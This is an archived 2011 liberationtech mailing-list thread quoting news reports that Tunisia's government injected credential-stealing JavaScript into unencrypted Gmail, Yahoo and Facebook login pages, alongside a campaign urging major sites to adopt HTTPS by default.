[liberationtech] Tunisian government hacks into gmail and Facebook accounts

Thu Jan 13 18:48:56 PST 2011

 Given what's been going on in Tunisia and Belarus recently, I thought it'd
be good to remind members of this list of Access’ *Demand HTTPS *campaign,
which calls on the top 100 websites to implement HTTPS by default on all
pages. Already signatories from over 60 countries have put their name to
this campaign, and I urge you to do so as well. Please also send this to
your friends and colleagues:

https://www.accessnow.org/ProtectOurPrivacy

Public pressure is working. We’ve just got off a call with Yahoo (Ebele
Okobi-Harris and Sonja Gittens-Ottley), and we'll be continuing to call on
them in the strongest terms (follow up call next week with their engineers)
to move their entire platform over to HTTPS. It's inspiring to see the
political momentum in Tunisia and announcements of an end to censorship, but
the threat of unencrypted sites remains a serious global issue with a
relatively simple fix.

Regardless of any technical hurdles to turn on SSL, it’s critical that
Yahoo, Facebook, and other sites understand that there truly is a public
outcry for encrypted communication. There is a real opportunity for change
here. Go to: https://www.accessnow.org/ProtectOurPrivacy

Best,

Jochai

-- 
Jochai Ben-Avie
Access Policy Analyst
jochai at accessnow.org
+1-888-414-0100 x704 (tel)
JochaiBen-Avie (skype)*

*
On Thu, Jan 13, 2011 at 4:51 PM, Jillian C. York <jilliancyork at gmail.com>wrote:

> From what I'm seeing, the filters have been turned off entirely; even
> Nawaat, which was allegedly blocked by keyword, is currently unfiltered
> (Sami Ben Gharbia's piece on Tunisia's multilayered filtering system:
> http://nawaat.org/portail/2010/08/19/a-first-glimpse-at-the-internet-filtering-in-tunisia/
> ).
>
> -Jillian
>
>
>
> On Thu, Jan 13, 2011 at 4:48 PM, Wagner, Ben <Ben.Wagner at eui.eu> wrote:
>
>> Having hacked Gmail and Facebook accounts, the Tunisian government now
>> claims that it wants to stop internet censorship entirely:
>>
>> "President Zine El Abidine Ben Ali, in a televised speech Thursday night,
>> also pledged to end Internet censorship and to open up the political playing
>> field in a country where he has allowed little public criticism for the past
>> 23 years."
>>
>> Source:
>> http://articles.moneycentral.msn.com/news/article.aspx?feed=AP&date=20110113&id=12601387
>>
>> At least some sites seem to have been unblocked including Youtube and the
>> OpenNet initiative. Whether this is a permanent change or not remains to be
>> seen. The general strike which is supposed to be taking place tomorrow may
>> also have a significant impact on many of the 'promises' made made by Ben
>> Ali this evening.
>>
>>
>> http://advocacy.globalvoicesonline.org/2011/01/13/is-tunisian-internet-censorship-shutting-down/
>>
>> Best,
>> Ben
>>
>>
>> On 13 Jan 2011, at 01:33, Terry Winograd wrote:
>>
>> >
>> http://www.fastcompany.com/1715575/tunisian-government-hacking-facebook-gmail-anonymous
>> >
>> > Tunisian Government Allegedly Hacking Facebook, Gmail Accounts of
>> > Dissidents and Journalists
>> > BY Neal UngerleiderMon Jan 10, 2011
>> >
>> >> A strange bit of JavaScript has found its way onto Tunisian Internet
>> users' internet login screens. Some are now in jail in a country known for
>> torture. But they've been adopted by an unlikely ally: Anonymous.
>> >
>> > Massive riots and protests have rocked Tunisia this past month. After
>> > a 26-year-old street vendor named Mohammed Bouazizi attempted to kill
>> > himself by self-immolation (he survived and later died of his burns),
>> > hundreds of thousands took to the North African nation's streets. The
>> > protesters complain of unemployment, economic woes, and an omnipresent
>> > dictatorship. Tunisia's government has stumbled upon a new method of
>> > combating the protesters: hacking into their social media accounts.
>> >
>> > According to a report by the Committee to Protect Journalists, the
>> > Tunisian government appears to be breaking into the Facebook, Google,
>> > and Yahoo accounts of dissidents and journalists. Hackers with unusual
>> > levels of access to Tunisia's state-control network infrastructure
>> > have managed to gain access to Facebook accounts belonging to
>> > individuals such as journalists Sofiene Chourabi of al-Tariq al-Jadid
>> > (New Path; a newspaper affiliated with the opposition Movement
>> > Ettajdid party) and independent video journalist Haythem El Mekki,
>> > while gaining the passwords of others. Hack targets found that
>> > Facebook groups they founded were deleted, as were pictures of
>> > protests. In CPJ's words, "Their accounts and pictures of recent
>> > protests have been deleted or otherwise compromised.” Blogs hosted on
>> > Blogspot and elsewhere are also being targeted. Here is an excerpt
>> > from a post by Lina Ben Mhenni of the A Tunisian Girl blog:
>> >
>> >> Well, I can understand ... No I can't understand that some stupid
>> person has hacked my e-mail then, my Facebook account. This stupid person
>> has also deleted some pages in which I am an administrator. Pages like that
>> of 7ellblog (launch a blog) which has been largely promoted even by official
>> media, the page of the Tunisian singer Amel Mathlouthi, Reading Books is
>> Better than Staring at others (yes they hate reading and culture uin my
>> country), the Tunisian blogosphere, and may be a page against censorship '
>> la censure nuit à l 'image de mon pays' (I don't have the confirmation yet)
>> and many other pages were deleted. What happened is so shameful because the
>> internet police is again confirming its stupidity and useless stubbornness.
>> Sofiene Chourabi and Azyz Amami are experiencing the same problem now. They
>> have been hacked.
>> >
>> > Already, in-depth information is surfacing on how the hacks were
>> > committed. It appears that the Agence tunisienne d'Internet, a
>> > government agency which supervises all of Tunisia's ISPs, or someone
>> > with access to the agency committed them. Tunisian ISPs are running a
>> > Java script that siphons off login credentials from users of Facebook,
>> > Yahoo and Gmail. According to the Tech Herald's Steve Ragan:
>> >
>> >> Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s
>> Josh Abraham, broke the code down further. Crowley explained that the
>> JavaScript is customized for each site’s login form. It will pull the
>> username and password, and encode it with a weak crypto algorithm. The newly
>> encrypted data is placed into the URL, and a randomly generated five
>> character key is added. The randomly generated key is meaningless, but it is
>> assumed that it’s there to add a false sense of legitimacy to the URL. The
>> random characters and encrypted user information are delivered in the form
>> of a GET request to a non working URL.
>> >
>> > The code only targeted users accessing HTTP sites instead of HTTPS,
>> > which appears to be why Facebook was so heavily ravaged by the hack
>> > plan. Facebook users default to using HTTP to access the site.
>> >
>> > Much of this information has been released to the public by the
>> > quasi-4Chan allied Anonymous group, which has launched an
>> > anti-Tunisian government hacker campaign called Operation: Tunisia.
>> >
>> > Amamou was taken into police custody this past week after authorities
>> > apparently found his location via Foursquare. His current whereabouts
>> > are unknown.
>> >
>> > The Agence tunisienne d'Internet has long been one of the most
>> > censorship-happy government agencies in all of Africa. Tunisia's net
>> > firewalls and intricate IP tracking mechanisms have been compared to
>> > China's, while popular sites like YouTube and DailyMotion were banned
>> > due to hosting videos alleging human rights abuses in Tunisian
>> > prisons. In one of the WikiLeaks cables on Tunisia, an anonymous
>> > diplomat notes endemic government corruption and refers to the
>> > government of President-for-life Zine al-Abidine Ben Ali as a
>> > “quasi-mafia” and a police state.”
>> >
>> > While Facebook, Google and Yahoo have not spoken publicly on the
>> > alleged Tunisian government hacking campaign yet, the State Department
>> > has. In a press conference on Friday, January 7, spokesperson Philip
>> > Crowley stated:
>> >
>> >> We are concerned about recent reports that Tunisian ISP providers, at
>> the direction of the government, hacked into the accounts of Tunisian users
>> of American companies including Facebook, and providers of email such as
>> Yahoo and Google, and stealing passwords. This kind of interference
>> threatens the ability of civil society to realize the benefits of new
>> technologies. Cyber intrusions of all kinds, including reported attacks on
>> government of Tunisia websites, disrupt the free flow of information and
>> reduce overall confidence in the reliability and security of vital
>> information networks.
>> >
>> > During the past week, in addition to Amamou, at least three other
>> > members of Tunisia's hacker and blogger communities were taken into
>> > custody by Tunisian police.
>> >
>> >
>> > ----------------------------------
>> >
>> >
>> http://www.thetechherald.com/article.php/201101/6651/Tunisian-government-harvesting-usernames-and-passwords
>> >
>> > Tunisian government harvesting usernames and passwords
>> > by Steve Ragan - Jan 4 2011, 20:08
>> >
>> >
>> > The Tunisian Internet Agency (Agence tunisienne d'Internet or ATI) is
>> > being blamed for the presence of injected JavaScript that captures
>> > usernames and passwords. The code has been discovered on login pages
>> > for Gmail, Yahoo, and Facebook, and said to be the reason for the
>> > recent rash of account hijackings reported by Tunisian protesters.
>> >
>> > ATI is run by the Tunisian Ministry of Communications. They supply all
>> > of the privately held Tunisian ISPs, making them the main source of
>> > Internet access in the country. They’ve been under scrutiny for years,
>> > due to the fact that they make use of their authority to regulate the
>> > entire national network. Last April, ATI earned international
>> > attention by blocking access to sites such as Flickr, YouTube, and
>> > Vimeo.
>> >
>> > According to Reporters Without Borders, authorities claim to target
>> > only pornographic or terrorist websites. “However, censorship applies
>> > above all to political opposition, independent news, and human rights
>> > websites.”
>> >
>> > “When an Internet user attempts to access a prohibited website, the
>> > following automatic error message appears: “Error 404: page not
>> > found,” without displaying the familiar “Error 403” more typical of a
>> > blocked site...This strategy equates to a disguised form of
>> > censorship.”
>> >
>> > As for the JavaScript itself, The Tech Herald has seen examples of the
>> > embedded script during live surfing sessions with sources in Tunisia,
>> > and in posted source code made available to the Web. The source for
>> > the GMail injection is here, the Yahoo injection is here, and Facebook
>> > is here.
>> >
>> > Four different experts consulted by The Tech Herald independently
>> > confirmed our thoughts; the embedded code is siphoning off login
>> > credentials.
>> >
>> > On Twitter, security researcher Gerry Kavanagh and Errata Security CTO
>> > David Maynor told us that you can tell the code is capturing login
>> > information by how it references the login element for the form.
>> >
>> > “Suffice to say, the code is definitely doing something
>> > surreptitious,” Kavanagh noted.
>> >
>> > Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s
>> > Josh Abraham, broke the code down further. Crowley explained that the
>> > JavaScript is customized for each site’s login form. It will pull the
>> > username and password, and encode it with a weak crypto algorithm.
>> >
>> > The newly encrypted data is placed into the URL, and a randomly
>> > generated five character key is added. The randomly generated key is
>> > meaningless, but it is assumed that it’s there to add a false sense of
>> > legitimacy to the URL.
>> >
>> > The random characters and encrypted user information are delivered in
>> > the form of a GET request to a non working URL. In the Gmail example,
>> > you see this URL listed as http://www.google.com/wo0dh3ad. Abraham
>> > noted that the encryption makes it easy to capture usernames and
>> > passwords that would include special characters such as ‘%’ or ‘/’.
>> >
>> > Considering that the backbone of the Tunisian Internet is full of
>> > state run filters and firewalls designed to block access, configuring
>> > one to log the GET commands with the harvested data would be trivial.
>> > But is this a government sponsored action?
>> >
>> > The likelihood that a group of criminals compromised the entire
>> > Tunisian infrastructure is virtually nonexistent. Code planting on
>> > this scale could only originate form an ISP. With their history of
>> > holding an iron grip on the Internet, ATI is the logical source of the
>> > information harvesting.
>> >
>> > There is an upside however, as the embedded JavaScript only appears
>> > when one of the sites is accessed with HTTP instead of HTTPS. In each
>> > test case, we were able to confirm that Gmail and Yahoo were only
>> > compromised when HTTP was used. For Facebook on the other hand, the
>> > default is access is HTTP, so users in Tunisia will need to visit the
>> > HTTPS address manually.
>> >
>> > Another interesting note is that it appears the embedded code has
>> > targeted Tunisian users for several months. Slim Amamou, of the Global
>> > Voices Advocacy blog, reported his findings on the code last July, and
>> > at the time, ATI was blocking Google’s HTTPS port, forcing users to
>> > default to HTTP.
>> >
>> > The information surrounding the embedded JavaScript came to our
>> > attention thanks to a user on the IRC server where supporters for
>> > Anonymous’ Operation: Tunisia gathered to show support for Tunisian
>> > protesters. When word spread of embedded code and account hijackings,
>> > Anonymous offered Tunisian users help via Userscripts.org, with a
>> > browser add-on that strips the added JavaScript code.
>> >
>> > The ATI website has been offline for more than a day. The outage
>> > started after Anonymous launched Operation: Tunisia. Our coverage on
>> > their actions and the problems in Tunisia is here.
>> >
>> > --
>> > _______________________________________________
>> > liberationtech mailing list
>> > liberationtech at lists.stanford.edu
>> >
>> > Should you need to change your subscription options, please go to:
>> >
>> > https://mailman.stanford.edu/mailman/listinfo/liberationtech
>> >
>> > If you would like to receive a daily digest, click "yes" (once you click
>> above) next to "would you like to receive list mail batched in a daily
>> digest?"
>> >
>> > You will need the user name and password you receive from the list
>> moderator in monthly reminders.
>> >
>> > Should you need immediate assistance, please contact the list moderator.
>> >
>>
>>
>> _______________________________________________
>> liberationtech mailing list
>> liberationtech at lists.stanford.edu
>>
>> Should you need to change your subscription options, please go to:
>>
>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>
>> If you would like to receive a daily digest, click "yes" (once you click
>> above) next to "would you like to receive list mail batched in a daily
>> digest?"
>>
>> You will need the user name and password you receive from the list
>> moderator in monthly reminders.
>>
>> Should you need immediate assistance, please contact the list moderator.
>>
>
>
>
> --
> Berkman Center for Internet and Society |
> https://cyber.law.harvard.edu/people/jyork
> jilliancyork.com | @jilliancyork | tel: +1-857-891-4244
>
>
>
> _______________________________________________
> liberationtech mailing list
> liberationtech at lists.stanford.edu
>
> Should you need to change your subscription options, please go to:
>
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>
> If you would like to receive a daily digest, click "yes" (once you click
> above) next to "would you like to receive list mail batched in a daily
> digest?"
>
> You will need the user name and password you receive from the list
> moderator in monthly reminders.
>
> Should you need immediate assistance, please contact the list moderator.
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.stanford.edu/pipermail/liberationtech/attachments/20110113/21ac95d0/attachment.html>